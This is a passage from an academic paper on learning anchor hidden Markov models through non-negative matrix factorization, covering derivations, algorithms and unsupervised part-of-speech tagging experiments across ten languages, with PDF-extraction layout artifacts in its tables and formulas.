convex com- bination of the rows of C: for x ∈ [n], Ax = m∑ h=1 Bx,h ×Ch Furthermore, by property 2 each h ∈ [m] has an as- sociated row ah ∈ [n] such that Aah = Cah . These properties can be exploited to recover B and C. A concrete algorithm for factorizing a matrix sat- isfying Condition 4.1 is given in Figure 1 (Arora et al., 2013). It first identifies a1 . . .am (up to some permutation) by greedily locating the row of A furthest away from the subspace spanned by the vertices selected so far. Then it recovers each Bx as the convex coefficients required to combine Aa1 . . .Aam to yield Ax. The latter computation (1) can be achieved with any constrained optimization method; we use the Frank-Wolfe algorithm (Frank and Wolfe, 1956). See Arora et al. (2013) for a proof of the correctness of this algorithm. 4.2 Random Variables To derive our algorithm, we make use of cer- tain random variables under the A-HMM. Let (X1, . . . ,XN ) ∈ [n]N be a random sequence of N ≥ 2 observations drawn from the model, along with the corresponding hidden state sequence (H1, . . . ,HN ) ∈ [m]N ; independently, pick a posi- tion I ∈ [N − 1] uniformly at random. Let YI ∈ Rd be a d-dimensional vector which is conditionally in- dependent of XI given HI, i.e., P(YI|HI,XI) = P(YI|HI). We will provide how to define such a variable in Section 4.4.1: YI will be a function of (X1, . . . ,XN ) serving as a “context” representation of XI revealing the hidden state HI. Define unigram probabilities u∞,u1 ∈ Rn and bigram probabilities B ∈ Rn×n where u∞x := P(XI = x) ∀x ∈ [n] u1x := P(XI = x|I = 1) ∀x ∈ [n] Bx,x′ := P(XI = x,XI+1 = x′) ∀x,x′ ∈ [n] Additionally, define π̄ ∈ Rm where π̄h = P(HI = h) ∀h ∈ [m] (2) We assume π̄h > 0 for all h ∈ [m]. 4.3 Derivation of a Learning Algorithm The following proposition provides a way to use the NMF algorithm in Figure 1 to recover the emission parameters O up to scaling. Proposition 4.1. Let XI ∈ [n] and YI ∈ Rd be respectively an observation and a context vector drawn from the random process described in Sec- tion 4.2. Define a matrix Ω ∈ Rn×d with rows Ωx = E[YI|XI = x] ∀x ∈ [n] (3) If rank(Ω) = m, then Ω satisfies Condition 4.1: Ω = ÕΘ 247 where Õx,h = P(HI = h|XI = x) and Θh = E[YI|HI = h]. Proof. E[YI|XI = x] = m∑ h=1 P(HI = h|XI = x) × E[YI|HI = h,XI = x] = m∑ h=1 P(HI = h|XI = x) × E[YI|HI = h] The last equality follows by the conditional inde- pendence of YI. This shows Ω = ÕΘ. By the an- chor assumption of the A-HMM, each h ∈ [m] has at least one x ∈ A(h) such that P(HI = h|XI = x) = 1, thus Ω satisfies Condition 4.1. A useful interpretation of Ω in Proposition 4.1 is that its rows Ω1 . . . Ωn are d-dimensional vec- tor representations of observation states forming a convex hull in Rd. This convex hull has m ver- tices Ωa1 . . . Ωam corresponding to anchors ah ∈ A(h) which can be convexly combined to realize all Ω1 . . . Ωn. Given Õ, we can recover the A-HMM parameters as follows. First, we recover the stationary state dis- tribution π̄ as: π̄h = ∑ x∈[n] P(HI = h|XI = x) ×P(XI = x) = ∑ x∈[n] Õx,h ×u∞x The emission parameters O are given by Bayes’ the- orem: Ox,h = P(HI = h|XI = x) ×P(XI = x)∑ x∈[n] P(HI = h|XI = x) ×P(XI = x) = Õx,h ×u∞x π̄h Using the fact that the emission probabilities are position-independent, we see that the initial state distribution π satisfies u1 = Oπ: u1x = P(XI = x|I = 1) = ∑ h∈[m] P(XI = x|HI = h,I = 1) ×P(HI = h|I = 1) = ∑ h∈[m] Ox,h ×πh Learn-Anchor-HMM Input: Ω in Proposition 4.1, number of hidden states m, bigram probabilities B, unigram probabilities u∞,u1 • Compute (Õ, Θ) ← Anchor-NMF(Ω,m). • Recover the parameters: π̄ ← Õ>u∞ (4) O ← diag(π̄)−1diag(u∞)Õ (5) π = O+u1 (6) T ← (diag(π̄)−1O+B(O>)+)> (7) Output: A-HMM parameters (π,T,O) Figure 2: NMF-based learning algorithm for A-HMMs. The algorithm Anchor-NMF is given in Figure 1. Thus π can be recovered as π = O+u1 where O+ is the Moore–Penrose pseudoinverse of O. Fi- nally, it can be algebraically verified that B = Odiag(π̄)T>O> (Hsu et al., 2012). Since all the in- volved matrices have rank m, we can directly solve for T as T = (diag(π̄)−1O+B(O>)+)> Figure 2 shows the complete algorithm. As input, it receives a matrix Ω satisfying Proposition 4.1, the number of hidden states, and the probabilities of ob- served unigrams and bigrams. It first decomposes Ω using the NMF algorithm in Figure 1. Then it computes the A-HMM parameters whose solution is given analytically. The following theorem guarantees the consis- tency of the algorithm. Theorem 4.1. Let (π,T,O) be an A-HMM such that rank(T) = m and π̄ defined in (2) has strictly pos- itive entries π̄h > 0. Given random variables Ω satisfying Proposition 4.1 and B,u∞,u1 under this model, the algorithm Learn-Anchor-HMM in Fig- ure 2 outputs (π,T,O) up to a permutation on hid- den states. Proof. By Proposition 4.1, Ω satisfies Condition 4.1 with Ω = ÕΘ, thus Õ can be recovered up to a permutation on columns with the algorithm Anchor- NMF. The consistency of the recovered parameters follows from the correctness of (4–7) under the rank conditions. 248 4.3.1 Constrained Optimization for π and T Note that (6) and (7) require computing the pseu- doinverse of the estimated O, which can be expen- sive and vulnerable to sampling errors in practice. To make our parameter estimation more robust, we can explicitly impose probability constraints. We re- cover π by solving: π = arg min π′∈∆m−1 ∣∣∣∣u1 −Oπ′ ∣∣∣∣ 2 (8) which can again be done with algorithms such as Frank-Wolfe. We recover T by maximizing the log likelihood of observation bigrams ∑ x,x′ Bx,x′ log   ∑ h,h′∈[m] π̄hOx,hTh′,hOx′,h′   (9) subject to the constraint (T>)h ∈ ∆m−1. Since (9) is concave in T with other parameters O and π̄ fixed, we can use EM to find the global optimum. 4.4 Construction of the Convex Hull Ω In this section, we provide several ways to construct a convex hull Ω satisfying Proposition 4.1. 4.4.1 Choice of the Context YI In order to satisfy Proposition 4.1, we need to de- fine the context variable YI ∈ Rd with two proper- ties: • P(YI|HI,XI) = P(YI|HI) • The matrix Ω with rows Ωx = E[YI|XI = x] ∀x ∈ [n] has rank m. A simple construction (Arora et al., 2013) is given by defining YI ∈ Rn to be an indicator vector for the next observation: [YI]x′ = { 1 if XI+1 = x′ 0 otherwise (10) The first condition is satisfied since XI+1 does not depend on XI given HI. For the second condition, observe that Ωx,x′ = P(XI+1 = x′|XI = x), or in matrix form Ω = diag (u∞)−1 B (11) Under the rank conditions in Theorem 4.1, (11) has rank m. More generally, we can let YI be an observation (encoded as an indicator vector as in (10)) randomly drawn from a window of L ∈ N nearby observa- tions. We can either only use the identity of the cho- sen observation (in which case YI ∈ Rn) or addi- tionally indicate the relative position in the window (in which case YI ∈ RnL). It is straightforward to verify that the above two conditions are satisfied un- der these definitions. Clearly, (11) is a special case with L = 1. 4.4.2 Reducing the Dimension of Ωx With the definition of Ω in the previous section, the dimension of Ωx is d = O(n) which can be dif- ficult to work with when n � m. Proposition 4.1 allows us to reduce the dimension as long as the fi- nal matrix retains the form in (3) and has rank m. In particular, we can multiply Ω by any rank-m projec- tion matrix Π ∈ Rd×m on the right side: if Ω sat- isfies the properties in Proposition 4.1, then so does ΩΠ with m-dimensional rows (ΩΠ)x = E[YIΠ|XI = x] Since rank(Ω) = m, a natural choice of Π is the projection onto the best-fit m-dimensional subspace of the row space of Ω. We mention that previous works on the NMF- learning framework have employed various projec- tion methods, but they do not examine relative mer- its of their choices. For instance, Arora et al. (2013) simply use random projection, which is convenient for theoretical analysis. Cohen and Collins (2014) use a projection based on canonical correlation anal- ysis (CCA) without further exploration. In con- trast, we give a full comparison of valid construc- tion methods and find that the choice of Ω is crucial in practice. 4.4.3 Construction of Ω for the Brown Model We can formulate an alternative way to construct a valid Ω when the model is further restricted to be a Brown model. Since every observation is an anchor, Ox ∈ Rm has a single nonzero entry for every x. Thus the rows defined by Ωx = Ox/ ||Ox|| (an in- dicator vector for the unique hidden state of x) form 249 Input: bigram probabilities B, unigram probabilities u∞, number of hidden states m, construction method τ Scaled Matrices: ( √ · is element-wise) B := diag (u∞)−1/2 Bdiag (u∞)−1/2 B̃ := diag (√ u∞ )−1/2 √ Bdiag (√ u∞ )−1/2 Singular Vectors: U(M) (V (M)) is an n×m matrix of the left (right) singular vectors of M corresponding to the largest m singular values • If τ 6= brown: set Ω ← diag (u∞)−1 BΠ where the projection matrix Π ∈ Rn×m is given by Πi,j ∼N(0, 1/m) if τ = random Π = V (diag (u∞)−1 B) if τ = best-fit Π = diag (u∞)−1/2 V (B) if τ = cca • If τ = brown: compute the transformed emission matrix as f(O) = U(B̃) and set Ω ← diag(v)−1f(O) where vx := ||f(O)x||2 is the length of the x-th row of f(O). Output: Ω ∈ Rn×m in Proposition 4.1 Figure 3: Algorithm for constructing a valid Ω with dif- ferent construction methods. For simplicity, we only show the bigram construction (context size L = 1), but an extension for larger context (L > 1) is straightforward. a trivial convex hull in which every point is a ver- tex. This corresponds to choosing an oracle context YI ∈ Rm where [YI]h = { 1 if HI = h 0 otherwise It is possible to recover the Brown model param- eters O up to element-wise scaling and rotation of rows using the algorithm of Stratos et al. (2015). More specifically, let f(O) ∈ Rn×m denote the out- put of their algorithm. Then they show that for some vector s ∈ Rm with strictly positive entries and an orthogonal matrix Q ∈ Rm×m: f(O) = O〈1/4〉diag(s)Q> where O〈1/4〉 is an element-wise exponentiation of O by 1/4. Since the rows of f(O) are simply some scaling and rotation of the rows of O, using Ωx = f(O)x/ ||f(O)x|| yields a valid Ω. While we need to impose an additional assump- tion (the Brown model restriction) in order to justify this choice of Ω, we find in our experiments that it performs better than other alternatives. We specu- late that this is because a Brown model is rather ap- propriate for the POS tagging task; many words are indeed unambiguous with respect to POS tags (Ta- ble 5). Also, the general effectiveness of f(O) for representational purposes has been demostrated in previous works (Stratos et al., 2014; Stratos et al., 2015). By restricting the A-HMM to be a Brown model, we can piggyback on the proven effective- ness of f(O). Figure 3 shows an algorithm for constructing Ω with these different construction methods. For sim- plicity, we only show the bigram construction (con- text size L = 1), but an extension for larger context (L > 1) is straightforward as discussed earlier. The construction methods random (random projection), best-fit (projection to the best-fit subspace), and cca (CCA projection) all compute (11) and differ only in how the dimension is reduced. The construction method brown computes the transformed Brown pa- rameters f(O) as the left singular vectors of a scaled covariance matrix and then normalizes its rows. We direct the reader to Stratos et al. (2015) for a deriva- tion of this calculation. 4.4.4 Ω with Feature Augmentation The x-th row of Ω is a d-dimensional vector repre- sentation of x lying in a convex set with m vertices. This suggests a natural way to incorporate domain- specific features: we can add additional dimensions that provide information about hidden states from the surface form of x. For instance, consider the the POS tagging task. In the simple construction (11), the representation of word x is defined in terms of neighboring words x′: [Ωx]x′ = E [ 1 ( XI+1 = x ′) |XI = x ] where 1(·) ∈ {0, 1} is the indicator function. We can augment this vector with s additional dimen- 250 sions indicating the spelling features of x. For in- stance, the (n + 1)-th dimension may be defined as: [Ωx]n+1 = E [1 (x ends in “ing” ) |XI = x] This value will be generally large for verbs and small for non-verbs, nudging verbs closer together and away from non-verbs. The modified (n + s)- dimensional representation is followed by the usual dimension reduction. Note that the spelling features are a deterministic function of a word, and we are implicitly assuming that they are independent of the word given its tag. While this is of course not true in practice, we find that these features can significantly boost the tagging performance. 5 Experiments We evaluate our A-HMM learning algorithm on the task of unsupervised POS tagging. The goal of this task is to induce the correct sequence of POS tags (hidden states) given a sequence of words (observa- tion states). The anchor condition corresponds to as- suming that each POS tag has at least one word that occurs only under that tag. 5.1 Background on Unsupervised POS Tagging Unsupervised POS tagging has long been an active area of research (Smith and Eisner, 2005a; John- son, 2007; Toutanova and Johnson, 2007; Haghighi and Klein, 2006; Berg-Kirkpatrick et al., 2010), but results on this task are complicated by vary- ing assumptions and unclear evaluation metrics (Christodoulopoulos et al., 2010). Rather than ad- dressing multiple alternatives for evaluating unsu- pervised POS tagging, we focus on a simple and widely used metric: many-to-one accuracy (i.e., we map each hidden state to the most frequently coin- ciding POS tag in the labeled data and compute the resulting accuracy). 5.1.1 Better Model v.s. Better Learning Vanilla HMMs are notorious for their mediocre performance on this task, and it is well known that they perform poorly largely because of model mis- specification, not because of suboptimal parameter estimation (e.g., because EM gets stuck in local op- tima). More generally, a large body of work points to the inappropriateness of simple generative mod- els for unsupervised induction of linguistic structure (Merialdo, 1994; Smith and Eisner, 2005b; Liang and Klein, 2008). Consequently, many works focus on using more expressive models such as log-linear models (Smith and Eisner, 2005a; Berg-Kirkpatrick et al., 2010) and Markov random fields (MRF) (Haghighi and Klein, 2006). These models are shown to deliver good performance even though learning is approxi- mate. Thus one may question the value of having a consistent estimator for A-HMMs and Brown mod- els in this work: if the model is wrong, what is the point of learning it accurately? However, there is also ample evidence that HMMs are competitive for unsupervised POS induc- tion when they incorporate domain-specific struc- tures. Johnson (2007) is able to outperform the sophisticated MRF model of Haghighi and Klein (2006) on one-to-one accuracy by using a sparse prior in HMM estimation. The clustering method of Brown et al. (1992) which is based on optimizing the likelihood under the Brown model (a special case of HMM) remains a baseline difficult to outperform (Christodoulopoulos et al., 2010). We add to this evidence by demonstrating the ef- fectiveness of A-HMMs on this task. We also check the anchor assumption on data and show that the A- HMM model structure is in fact appropriate for the problem (Table 5). 5.2 Experimental Setting We use the universal treebank dataset (version 2.0) which contains sentences annotated with 12 POS tag types for 10 languages (McDonald et al., 2013). All models are trained with 12 hidden states. We use the English portion to experiment with different hy- perparameter configurations. At test time, we fix a configuration (based on the English portion) and ap- ply it across all languages. The list of compared methods is given below: BW The Baum-Welch algorithm, an EM algorithm for HMMs (Baum and Petrie, 1966). CLUSTER A parameter estimation scheme for HMMs based on Brown clustering (Brown et al., 1992). We run the Brown clustering algorithm1 to obtain 12 word clusters C1 . . .C12. Then we set 1We use the implementation of Liang (2005). 251 the emission parameters o(x|h), transition param- eters t(h′|h), and prior π(h) to be the maximum- likelihood estimates under the fixed clusters. ANCHOR Our algorithm Learn-Anchor-HMM in Figure 2 but with the constrained optimization (8) and (9) for estimating π and T .2 ANCHOR-FEATURES Same as ANCHOR but em- ploys the feature augmentation scheme described in Section 4.4.4. LOG-LINEAR The unsupervised log-linear model described in Berg-Kirkpatrick et al. (2010). Instead of emission parameters o(x|h), the model maintains a miniature log-linear model with a weight vector w and a feature function φ. The probability of a word x given tag h is computed as p(x|h) = exp(w >φ(x,h))∑ x∈[n] exp(w >φ(x,h)) The model can be trained by maximizing the like- lihood of observed sequences. We use L-BFGS to directly optimize this objective.3 This approach ob- tains the current state-of-the-art accuracy on fine- grained (45 tags) English WSJ dataset. We use maximum marginal decoding for HMM predictions: i.e., at each position, we predict the most likely tag given the entire sentence. 5.3 Practical Issues with the Anchor Algorithm In our experiments, we find that Anchor-NMF (Fig- ure 1) tends to propose extremely rare words as an- chors. A simple fix is to search for anchors only among relatively frequent words. We find that any reasonable frequency threshold works well; we use the 300 most frequent words. Note that this is not a problem if these 300 words include anchor words corresponding to all the 12 tags. We must define the context for constructing Ω. We use the previous and next words (i.e., context size L = 2) marked with relative positions. Thus Ω has 2n columns before dimension reduction. Table 1 shows the performance on the English portion with different construction methods for Ω. The Brown 2https://github.com/karlstratos/anchor 3We use the implementation of Berg-Kirkpatrick et al. (2010) (personal communication). Choice of Ω Accuracy Random 48.2 Best-Fit 53.4 CCA 57.0 Brown 66.1 Table 1: Many-to-one accuracy on the English data with different choices of the convex hull Ω (Figure 3). These results do not use spelling features. construction (τ = brown in Figure 3) clearly per- forms the best: essentially, the anchor algorithm is used to extract the HMM parameters from the CCA- based word embeddings of Stratos et al. (2015). We also explore feature augmentation discussed in Section 4.4.4. For comparison, we employ the same word features used by Berg-Kirkpatrick et al. (2010): • Indicators for whether a word is capitalized, contains a hyphen, or contains a digit • Suffixes of length 1, 2, and 3 We weigh the l2 norm of these extra dimensions in relation to the original dimensions: we find a small weight (e.g., 0.1 of the norm of the original dimensions) works well. We also find that these fea- tures can sometimes significantly improve the per- formance. For instance, the accuracy on the English portion can be improved from 66.1% to 71.4% with feature augmentation. Another natural experiment is to refine the HMM parameters obtained from the anchor algorithm (or Brown clusters) with a few iterations of the Baum- Welch algorithm. In our experiments, however, it did not significantly improve the tagging perfor- mance, so we omit this result. 5.4 Tagging Accuracy Table 2 shows the many-to-one accuracy on all lan- guages in the dataset. For the Baum-Welch algo- rithm and the unsupervised log-linear models, we report the mean and the standard deviation (in paren- theses) of 10 random restarts run for 1,000 itera- tions. Both ANCHOR and ANCHOR-FEATURES compete favorably. On 5 out of 10 languages, ANCHOR- FEATURES achieves the highest accuracy, often 252 Model de en es fr id it ja ko pt-br sv BW (4.8) 45.5 (3.4) 59.8 (2.2) 60.6 (3.6) 60.1 (3.1) 49.6 (2.6) 51.5 (2.1) 59.5 (0.6) 51.7 (3.7) 59.5 (3.0) 42.4 CLUSTER 60.0 62.9 67.4 66.4 59.3 66.1 60.3 47.5 67.4 61.9 ANCHOR 61.1 66.1 69.0 68.2 63.7 60.4 65.3 53.8 64.9 51.1 ANCHOR-FEATURES 63.4 71.4 74.3 71.9 67.3 60.2 69.4 61.8 65.8 61.0 LOG-LINEAR (1.8) 67.5 (3.5) 62.4 (3.1) 67.1 (4.5) 62.1 (3.9) 61.3 (2.9) 52.9 (2.9) 78.2 (3.6) 60.5 (2.2) 63.2 (2.5) 56.7 Table 2: Many-to-one accuracy on each language using 12 universal tags. The first four models are HMMs estimated with the Baum-Welch algorithm (BW), the clustering algorithm of Brown et al. (1992), the anchor algorithm without (ANCHOR) and with (ANCHOR-FEATURES) feature augmentation. LOG-LINEAR is the model of Berg-Kirkpatrick et al. (2010) trained with the direct-gradient method using L-BFGS. For BW and LOG-LINEAR, we report the mean and the standard deviation (in parentheses) of 10 random restarts run for 1,000 iterations. closely followed by ANCHOR. The Brown clustering estimation is also competitive and has the highest accuracy on 3 languages. Not surprisingly, vanilla HMMs trained with BW perform the worst (see Sec- tion 5.1.1 for a discussion). LOG-LINEAR is a robust baseline and performs the best on the remaining 2 languages. It per- forms especially strongly on Japanese and Korean datasets in which poorly segmented strings such as “1950年11月5日には” (on November 5, 1950) and “40.3%로” (by 40.3%) abound. In these datasets, it is crucial to make effective use of morphological features. 5.5 Qualitative Analysis 5.5.1 A-HMM Parameters An A-HMM can be easily interpreted since each hidden state is marked with an anchor observation. Table 3 shows the 12 anchors found in each lan- guage. Note that these anchor words generally have a wide coverage of possible POS tags. We also experimented with using true anchor words (obtained from labeled data), but they did not improve performance over automatically induced anchors. Since anchor discovery is inherently tied to parameter estimation, it is better to obtain anchors in a data-driven manner. In particular, certain POS tags (e.g., X) appear quite infrequently, and the model is worse off by being forced to allocate a hidden state for such a tag. Table 4 shows words with highest emission prob- abilities o(x|h) under each anchor. We observe that an anchor is representative of a certain group of words. For instance, the state “loss” rep- resents noun-like words, “1” represents numbers, “on” represents preposition-like words, “one” rep- resents determiner-like words, and “closed” repre- sents verb-like words. The conditional distribution is peaked for anchors that represent function tags (e.g., determiners, punctuation) and flat for anchors that represent content tags (e.g., nouns). Occasion- ally, an anchor assigns high probabilities to words that do not seem to belong to the corresponding POS tag. But this is to be expected since o(x|h) ∝ P(XI = x) is generally larger for frequent words. 5.5.2 Model Assumptions on Data Table 5 checks the assumptions in A-HMMs and Brown models on the universal treebank dataset. The anchor assumption is indeed satisfied with 12 universal tags: in every language, each tag has at least one word uniquely associated with the tag. The Brown assumption (each word has exactly one possible tag) is of course not satisfied, since some words are genuinely ambiguous with respect to their POS tags. However, the percentage of unambigu- ous words is very high (well over 90%). This analy- sis supports that the model assumptions made by A- HMMs and Brown models are appropriate for POS tagging. Table 6 reports the log likelihood (normalized by the number of words) on the English portion of different estimation methods for HMMs. BW and CLUSTER obtain higher likelihood than the anchor algorithm, but this is expected given that both EM 253 de en es fr id it ja ko pt-br sv empfehlen loss y avait bulan radar お世話に 완전 E och wie 1 hizo commune tetapi però ないと 중에 de bör ; on - Le wilayah sulle ことにより 경우 partida grund Sein one especie de - - されている。 줄 fazer mellan Berlin closed Además président Bagaimana Stati ものを 같아요 meses i und are el qui , Lo , 많은 os sociala , take paı́ses ( sama legge した , : . - , la à . al それは 볼 diretor bli der vice España États dan far- 、 자신의 2010 den im to en Unis Utara di 幸福の 받고 , , des York de Cette pada la ことが 맛있는 uma tid Region Japan municipio quelques yang art. 通常の 위한 O Detta Table 3: Anchor words found in each language (model ANCHOR-FEATURES). loss year (.02) market (.01) share (.01) company (.01) stock (.01) quarter (.01) shares (.01) price (.01) 1 1 (.03) 10 (.02) 30 (.02) 15 (.02) 8 (.02) 2 (.01) 20 (.01) 50 (.01) on of (.14) in (.12) . (.08) for (.06) on (.04) by (.04) from (.04) and (.03) one the (.23) a (.12) “ (.03) an (.03) $ (.02) its (.02) that (.02) this (.02) closed said (.05) ’s (.02) is (.02) says (.02) was (.01) has (.01) had (.01) expected (.01) are and (.08) is (.08) are (.05) was (.04) ’s (.04) “ (.04) has (.03) of (.03) take be (.04) % (.02) have (.02) million (.02) But (.02) do (.01) The (.01) make (.01) , , (.53) . (.25) and (.05) ” (.04) % (.01) million (.01) – (.01) that (.01) vice ’s (.03) The (.02) “ (.02) New (.01) and (.01) new (.01) first (.01) chief (.01) to to (.39) . (.11) a (.06) will (.04) $ (.03) n’t (.03) would (.02) % (.02) York the (.15) a (.05) The (.04) of (.04) ’s (.04) million (.01) % (.01) its (.01) Japan Mr. (.03) it (.02) ” (.02) $ (.02) he (.02) that (.02) which (.01) company (.01) Table 4: Most likely words under each anchor word (English model ANCHOR-FEATURES). Emission probabilities o(x|h) are given in parentheses. and Brown clustering directly optimize likelihood. In contrast, the anchor algorithm is based on the method of moments and does not (at least directly) optimize likelihood. Note that high likelihood does not imply high accuracy under HMMs. 6 Related Work 6.1 Latent-Variable Models There has recently been great progress in estima- tion of models with latent variables. Despite the NP-hardness in general cases (Terwijn, 2002; Arora et al., 2012), many algorithms with strong theoreti- cal guarantees have emerged under natural assump- tions. For example, for HMMs with full-rank condi- tions, Hsu et al. (2012) derive a consistent estimator of the marginal distribution of observed sequences. Anandkumar et al. (2014) propose an exact tensor decomposition method for learning a wide class of latent variable models with similar non-degeneracy conditions. Arora et al. (2013) derive a provably cor- rect learning algorithm for topic models with a cer- tain parameter structure. The anchor-based framework has been originally formulated for learning topic models (Arora et al., 2013). It has been subsequently adopted to learn other models such as latent-variable probabilistic context-free grammars (Cohen and Collins, 2014). In our work, we have extended this framework to address unsupervised sequence labeling. Zhou et al. (2014) also extend Arora et al. (2013)’s framework to learn various models includ- ing HMMs, but they address a more general prob- lem. Consequently, their algorithm draws from Anandkumar et al. (2012) and is substantially dif- ferent from ours. 6.2 Unsupervised POS Tagging Unsupervised POS tagging is a classic problem in unsupervised learning that has been tackled with various approaches. Johnson (2007) observes that 254 de en es fr id it ja ko pt-br sv % anchored tags 100.0 100.0 100.0 100.0 100.0 100.0 100.0 100.0 100.0 100.0 % unambig words 96.6 91.5 94.0 94.2 94.8 94.8 99.5 98.4 94.8 97.4 . VERB PRON ADP NOUN ADV CONJ DET NUM ADJ X PRT , said it from Mr. n’t or which billion new bono na 53928 6339 5147 4856 4436 3582 2748 2458 1935 1542 8 5 Table 5: Verifying model assumptions on the universal treebank. The anchor assumption is satisfied in every language. The Brown assumption (each word has exactly one possible tag) is violated but not by a large margin. The lower table shows the most frequent anchor word and its count under each tag on the English portion. Model Normalized LL Acc BW -6.45 59.8 CLUSTER -6.71 62.9 ANCHOR -7.06 66.1 ANCHOR-FEATURES -7.05 71.4 Table 6: Log likelihood normalized by the number of words on English (along with accuracy). For BW, we report the mean of 10 random restarts run for 1,000 it- erations. EM performs poorly in this task because it induces flat distributions; this is not the case with our algo- rithm as seen in the peaky distributions in Table 4. Haghighi and Klein (2006) assume a set of proto- typical words for each tag and report high accuracy. In contrast, our algorithm automatically finds such prototypes in a subroutine. Berg-Kirkpatrick et al. (2010) achieve the state- of-the-art result in unsupervised fine-grained POS tagging (mid-70%). As described in Section 5.2, their model is an HMM in which probabilties are given by log-linear models. Table 7 provides a point of reference comparing our work with Berg- Kirkpatrick et al. (2010) in their setting: models are trained and tested on the entire 45-tag WSJ dataset. Their model outperforms our approach in this set- ting: with fine-grained tags, spelling features be- come more important, for instance to distinguish “played” (VBD) from “play” (VBZ). Nonetheless, we have shown that our approach is competitive when universal tags are used (Table 2). Many past works on POS induction predate the introduction of the universal tagset by Petrov et al. (2012) and thus report results with fine-grained tags. More recent works adopt the universal tagset but Models Accuracy BW 62.6 (1.1) CLUSTER 65.6 ANCHOR 67.2 ANCHOR-FEATURES 67.7 LOG-LINEAR 74.9 (1.5) Table 7: Many-to-one accuracy on the English data with 45 original tags. We use the same setting as in Table 2. For BW and LOG-LINEAR, we report the mean and the standard deviation (in parentheses) of 10 random restarts run for 1,000 iterations. they leverage additional resources. For instance, Das and Petrov (2011) and Täckström et al. (2013) use parallel data to project POS tags from a supervised source language. Li et al. (2012) use tag dictionar- ies built from Wiktionary. Thus their results are not directly comparable to ours.4 7 Conclusion We have presented an exact estimation method for learning anchor HMMs from unlabeled data. There are several directions for future work. An important direction is to extend the method to a richer family of models such as log-linear models or neural net- works. Another direction is to further generalize the method to handle a wider class of HMMs by relax- ing the anchor condition (Condition 4.1). This will require a significant extension of the NMF algorithm in Figure 1. 4Das and Petrov (2011) conduct unsupervised experiments using the model of Berg-Kirkpatrick et al. (2010), but their dataset and evaluation method differ from ours. 255 Acknowledgments We thank Taylor Berg-Kirkpatrick for providing the implementation of Berg-Kirkpatrick et al. (2010). We also thank anonymous reviewers for their con- structive comments. References Animashree Anandkumar, Daniel Hsu, and Sham M. Kakade. 2012. A method of moments for mixture models and hidden Markov models. In Twenty-Fifth Annual Conference on Learning Theory. Animashree Anandkumar, Rong Ge, Daniel Hsu, Sham M. Kakade, and Matus Telgarsky. 2014. Ten- sor decompositions for learning latent variable models. Journal of Machine Learning Research, 15(1):2773– 2832. Sanjeev Arora, Rong Ge, and Ankur Moitra. 2012. Learning topic models–going beyond SVD. In Foun- dations of Computer Science (FOCS), 2012 IEEE 53rd Annual Symposium on, pages 1–10. IEEE. Sanjeev Arora, Rong Ge, Yonatan Halpern, David Mimno, Ankur Moitra, David Sontag, Yichen Wu, and Michael Zhu. 2013. A practical algorithm for topic modeling with provable guarantees. In Proceedings of the 30th International Conference on Machine Learn- ing (ICML-13), pages 280–288. Leonard E. Baum and Ted Petrie. 1966. Statisti- cal inference for probabilistic functions of finite state Markov chains. The Annals of Mathematical Statis- tics, 37(6):1554–1563. Taylor Berg-Kirkpatrick, Alexandre Bouchard-Côté, John DeNero, and Dan Klein. 2010. Painless unsu- pervised learning with features. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Com- putational Linguistics, pages 582–590. Association for Computational Linguistics. Peter F. Brown, Peter V. Desouza, Robert L. Mercer, Vin- cent J. Della Pietra, and Jenifer C. Lai. 1992. Class- based n-gram models of natural language. Computa- tional Linguistics, 18(4):467–479. Christos Christodoulopoulos, Sharon Goldwater, and Mark Steedman. 2010. Two decades of unsupervised POS induction: How far have we come? In Proceed- ings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 575–584. Asso- ciation for Computational Linguistics. Shay B. Cohen and Michael Collins. 2014. A provably correct learning algorithm for latent-variable PCFGs. In Proceedings of ACL. Dipanjan Das and Slav Petrov. 2011. Unsupervised part-of-speech tagging with bilingual graph-based pro- jections. In Proceedings of the 49th Annual Meet- ing of the Association for Computational Linguistics: Human Language Technologies-Volume 1, pages 600– 609. Association for Computational Linguistics. Marguerite Frank and Philip Wolfe. 1956. An algorithm for quadratic programming. Naval Research Logistics Quarterly, 3(1-2):95–110. Aria Haghighi and Dan Klein. 2006. Prototype-driven learning for sequence models. In Proceedings of the main conference on Human Language Technol- ogy Conference of the North American Chapter of the Association of Computational Linguistics, pages 320– 327. Association for Computational Linguistics. Daniel Hsu, Sham M. Kakade, and Tong Zhang. 2012. A spectral algorithm for learning hidden Markov mod- els. Journal of Computer and System Sciences, 78(5):1460–1480. Mark Johnson. 2007. Why doesn’t EM find good HMM POS-taggers? In EMNLP-CoNLL, pages 296–305. Shen Li, Joao V. Graça, and Ben Taskar. 2012. Wiki- ly supervised part-of-speech tagging. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, pages 1389–1398. Asso- ciation for Computational Linguistics. Percy Liang and Dan Klein. 2008. Analyzing the errors of unsupervised learning. In ACL, pages 879–887. Percy Liang. 2005. Semi-supervised learning for natural language. Master’s thesis, Massachusetts Institute of Technology. Ryan T. McDonald, Joakim Nivre, Yvonne Quirmbach- Brundage, Yoav Goldberg, Dipanjan Das, Kuzman Ganchev, Keith B. Hall, Slav Petrov, Hao Zhang, Os- car Täckström, Claudia Bedini, Núria B. Castelló, and Jungmee Lee. 2013. Universal dependency annota- tion for multilingual parsing. In ACL, pages 92–97. Bernard Merialdo. 1994. Tagging English text with a probabilistic model. Computational Linguistics, 20(2):155–171. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A universal part-of-speech tagset. In Proceedings of the Eighth International Conference on Language Re- sources and Evaluation (LREC’12). Noah A. Smith and Jason Eisner. 2005a. Contrastive estimation: Training log-linear models on unlabeled data. In Proceedings of the 43rd Annual Meeting on Association for Computational Linguistics, pages 354–362. Association for Computational Linguistics. Noah A. Smith and Jason Eisner. 2005b. Guiding un- supervised grammar induction using contrastive esti- mation. In Proc. of IJCAI Workshop on Grammatical Inference Applications, pages 73–82. 256 Karl Stratos, Do-kyum Kim, Michael Collins, and Daniel Hsu. 2014. A spectral algorithm for learning class- based n-gram models of natural language. In Proceed- ings of the thirtieth conference on Uncertainty in Arti- ficial Intelligence. Karl Stratos, Michael Collins, and Daniel Hsu. 2015. Model-based word embeddings from decompositions of count matrices. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguis- tics and the 7th International Joint Conference on Nat- ural Language Processing (Volume 1: Long Papers), pages 1282–1291, Beijing, China, July. Association for Computational Linguistics. Oscar Täckström, Dipanjan Das, Slav Petrov, Ryan Mc- Donald, and 